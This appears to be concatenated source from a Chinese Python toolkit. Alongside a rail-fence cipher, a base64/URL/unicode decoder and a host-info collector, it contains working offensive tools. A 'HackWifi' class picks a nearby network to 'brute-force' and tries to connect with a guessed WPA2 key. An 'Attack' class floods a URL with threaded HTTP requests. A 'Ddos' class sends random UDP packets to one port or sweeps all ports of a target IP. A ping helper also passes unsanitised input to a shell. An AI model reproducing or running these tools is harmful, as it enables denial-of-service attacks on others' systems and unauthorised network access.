__name__    = "moligeek"
__version__ = "1.0.6"
__author__   = "yourmoln"
__author_email__ = "yourmoln@outlook.com"
__url__     = "https://github.com/yourmoln/moligeek"
__description__ = "一款逐渐完善的python集成工具,努力为开发者提供最大的便利"
__license__ = "Apache 2.0"
__copyright__ = 'Copyright yourmoln'



import math

def decrypt(cipher, key):
    """`栅栏密码`的解密函数. 与`千千秀字`的结果一致."""
    assert type(key) is int

    cipsize = len(cipher)
    gsize = math.ceil(cipsize / key)
    psize = gsize * key - cipsize
    common_count = key - psize        # 正常解码的行数

    res = ''
    for i in range(gsize):
        j = i
        while j < cipsize and (i < common_count or j < common_count * gsize):
            res += cipher[j]
            j += gsize if j < common_count * gsize else gsize - 1
    return res

def encrypt(plain, key):
    """`栅栏密码`的加密函数. """
    assert type(key) is int

    plain_size = len(plain)
    gcount = math.ceil(plain_size / key)
    common_size = key * (1 - gcount) + plain_size

    res = ''
    for i in range(key):
        j = i
        while j < plain_size and (i < common_size or j < key * (gcount - 1)):
            res += plain[j]
            j += key
    return res

if __name__ == "__main__":
    plain = "123456789abcdef"
    key = 4
    _enc = encrypt(plain, key)
    _dec = decrypt(_enc, key)
    print("_enc:", _enc)
    print("_dec:", _dec)
    


import pywifi,time
class HackWifi:
    def choose(self):
        self.ifaces.scan()
        result=self.ifaces.scan_results()
        time.sleep(1)
        order = 0
        list = []
        for WIFI in result:
            order += 1
            print(order,".",WIFI.ssid.encode('raw_unicode_escape').decode('utf-8'))
            list.append(WIFI.ssid)
        name = int(input("选择你要爆破的WiFi(序号):"))
        return list[name-1]
    def hack(self,ssid,key):
        self.ifaces.disconnect()
        time.sleep(1)
        profile = pywifi.Profile()
        profile.ssid = ssid
        profile.auth = pywifi.const.AUTH_ALG_OPEN
        profile.akm.append(pywifi.const.AKM_TYPE_WPA2PSK)
        profile.cipher = pywifi.const.CIPHER_TYPE_CCMP
        profile.key = key
        self.ifaces.remove_all_network_profiles()
        tep_profile = self.ifaces.add_network_profile(profile)
        self.ifaces.connect(tep_profile)
        time.sleep(3)
        if self.ifaces.status() == pywifi.const.IFACE_CONNECTED:
            print("WiFi连接成功")
        else:
            print("连接失败")
    def __init__(self):
        wifi = pywifi.PyWiFi()
        self.ifaces = wifi.interfaces()[0]
        self.ifaces.disconnect()
        time.sleep(1)
        ssid = self.choose()
        self.hack(ssid,"12345678")


if __name__ == "__main__":
    a = HackWifi()




import base64,urllib

class todecode:
    def base64(self):
        try:
            return base64.b64decode(self.text.encode("utf-8")).decode("utf-8")
        except:
            return
    def base32(self):
        try:
            return base64.b32decode(self.text.encode("utf-8")).decode("utf-8")
        except:
            return
    def base16(self):
        try:
            return base64.b16decode(self.text.encode("utf-8")).decode("utf-8")
        except:
            return
    def url(self):
        try:
            return urllib.parse.unquote(self.text)
        except:
            return
    def unicode(self):
        try:
            return self.text.encode("utf-8").decode("unicode_escape")
        except:
            return
    def autodecode(self):
        return {"base64":self.base64(),"base32":self.base32(),"base16":self.base16(),"URL":self.url(),"unicode":self.unicode()}
    def __init__(self,text):
        self.text = text
if __name__ == "__main__":
    a = todecode("5L2g5aW9")
    print(a.autodecode())
    # a = derail("123456",5)


import os,socket,threading,requests,meo,random

headers = {
    "User-Agent": meo.net.UserAgent.FIREFOX
}

#本机信息
from .hostinfo import Hostinfo

# ping
def ping(host):
    return os.popen("ping "+ host).read()

# 获取ip
def getip(name):
    try:
        return socket.gethostbyname(name)
    except:
        return None



# 洪水攻击
class Attack:
    def attack(self):
        for i in range(self.speed):
            try:
                r = requests.get(self.url, self.headers)
                self.collector['success'] += 1
            except:
                # 发送失败
                self.collector['err'] += self.speed - i
                break
    def attackRun(self):
        while self.start:
            t = threading.Thread(target=self.attack, args=())
            t.start()
    def run(self):
        self.start = True
        t = threading.Thread(target=self.attackRun, args=())
        t.start()
    def stop(self):
        self.start = False
    def __init__(self, url, speed, headers=headers):
        self.url = url
        self.speed = speed
        self.headers = headers
        self.collector = {
            "success": 0,
            "err": 0,
        }


class Ddos:
    # 泛洪攻击
    def allRun(self):
        self.data['port'] = self.port
        while self.start:
            self.sock.sendto(self.bytes, (self.ip,self.data['port']))
            self.data['sent'] += 1
            self.data['port'] += 1
            if self.data['port'] == 65534:
                self.data['port'] = 1
    def all(self):
        self.start = True
        t = threading.Thread(target=self.allRun, args=())
        t.start()
    # 洪攻击
    def oneRun(self):
        self.rport = self.port
        while self.start:
            self.sock.sendto(self.bytes, (self.ip,self.port))
            self.data['sent'] += 1
    def one(self):
        self.start = True
        t = threading.Thread(target=self.oneRun, args=())
        t.start()
    # 停止攻击
    def stop(self):
        self.start = False
    def __init__(self, ip, port = 1):
        self.sent = 0
        self.ip = ip
        self.port = port
        self.data = {
            "sent": 0,
            "port": 0,
        }
        #初始化数据包
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.bytes = random._urandom(1490)



if __name__ == "__main__":
    print(ping('8.8.8.8'))


import socket,json,os,platform,time
from requests import get

class Hostinfo:
    def getip(self):
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            address = ("8.8.8.8", 80)
            s.connect(address)
            sockname = s.getsockname()
            ip = sockname[0]
            port = sockname[1]
        finally:
            s.close()
        return ip
    def getoutip(self):
        try:
            return get('http://ifconfig.me/ip', timeout=1).text.strip()
        except:
            return None
    def all(self):
        result = {"网络信息":{"公网ip":self.outip,"内网ip":self.ip},
                  "系统信息":{"系统类型":platform.system(),
                                "系统版本":platform.version(),
                                "计算机名":platform.node(),
                                "CPU架构":platform.machine(),
                                "CPU厂商":platform.processor(),
                                "系统时间":time.asctime()},
                  "脚本信息":{"脚本位置":os.path.split(os.path.realpath(__file__))[0].replace(r"moligeek\core\network",'')}}
        return result
    def __init__(self):
        self.outip = self.getoutip()
        self.ip = self.getip()
if __name__ == "__main__":
    print("获取信息中...")
    a = Hostinfo()
    result = a.all()
    for key,value in result.items():
        print("="*20)
        print(key)
        for k,v in value.items():
            print(k,v)
